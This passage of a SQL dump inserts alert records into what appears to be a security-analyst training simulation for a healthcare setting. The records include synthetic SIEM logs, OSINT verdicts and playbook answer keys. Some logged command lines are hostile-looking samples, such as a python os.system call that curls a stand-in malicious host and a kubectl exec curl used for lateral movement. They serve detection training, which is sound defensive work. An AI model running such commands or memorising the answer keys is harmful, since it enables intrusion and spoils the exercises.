3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1400, 'Suspicious Logins Detected from Foreign Location', 'medium', 'Azure Defender', 'Multiple failed login attempts were detected from an IP address located in a region not typically accessed by the user. May indicate a brute force or credential stuffing attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:33:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.3.10\",\"username\":\"jane.smith\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 103 times for brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a foreign IP indicates a potential brute force attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1401, 'Exposed GCP Storage Bucket Detected', 'high', 'GCP SCC', 'An exposed GCP storage bucket was detected, which may lead to unauthorized access to sensitive healthcare data.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:20:45Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.27\",\"dst_ip\":\"10.0.0.5\",\"username\":\"n/a\",\"hostname\":\"storage.googleapis.com\",\"request_body\":\"GET /unsecured-bucket/medical-data\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple data breaches\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"storage.googleapis.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Exposed cloud storage URL\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The exposed GCP storage bucket could lead to unauthorized data access, indicating a potential data breach.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1402, 'Lambda Function Misuse Detected in AWS', 'critical', 'AWS GuardDuty', 'A suspicious execution of a Lambda function was detected, possibly indicating an attempt to use AWS resources for unauthorized activities.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.4.20\",\"username\":\"lambda-user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"python3 -c \'import os; os.system(\\\"curl http://malicious-site.com\\\")\'\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python3 -c \'import os; os.system(\\\"curl http://malicious-site.com\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized resource use\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Unauthorized command execution via Lambda function suggests potential misuse of AWS resources for malicious purposes.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1403, 'Kubernetes Pod Abnormal Activity Detected', 'high', 'Prisma Cloud', 'Unusual network traffic patterns detected from a Kubernetes pod, which may indicate a compromised container or unauthorized access attempt.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T13:30:29Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.50\",\"dst_ip\":\"10.0.2.50\",\"username\":\"kube-user\",\"hostname\":\"kube-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec pod-name -- curl http://10.0.2.50\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec pod-name -- curl http://10.0.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious network activity from a Kubernetes pod may indicate an attempt to move laterally within the network.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1404, 'False Positive: Suspicious Domain Accessed', 'low', 'Wiz', 'A domain flagged as suspicious was accessed, but further investigation shows it is used for legitimate purposes.', 'Web', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:15:42Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.35\",\"dst_ip\":\"198.51.100.100\",\"username\":\"alice.wonder\",\"hostname\":\"healthcare-partner.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"healthcare-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain for healthcare communications\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain was flagged as suspicious incorrectly, as it is used for legitimate business purposes.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:15:42Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.5.35\\\",\\\"dst_ip\\\":\\\"198.51.100.100\\\",\\\"username\\\":\\\"alice.wonder\\\",\\\"hostname\\\":\\\"healthcare-partner.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1405, 'False Positive: High Volume of Medical Record Access', 'medium', 'AWS GuardDuty', 'An employee accessed a high volume of medical records which initially appeared suspicious but was verified as part of routine duties.', 'Data Access', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T15:40:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.6.45\",\"dst_ip\":\"10.0.3.15\",\"username\":\"dr.jones\",\"hostname\":\"ehr-system\",\"request_body\":\"\",\"command_line\":\"python retrieve_records.py --batch 100\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.6.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python retrieve_records.py --batch 100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"clean\",\"details\":\"Routine script for batch processing of medical records\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_access\",\"analysis_notes\":\"The activity was part of scheduled data processing and does not indicate malicious intent.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:40:50Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.6.45\\\",\\\"dst_ip\\\":\\\"10.0.3.15\\\",\\\"username\\\":\\\"dr.jones\\\",\\\"hostname\\\":\\\"ehr-system\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python retrieve_records.py --batch 100\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.943Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 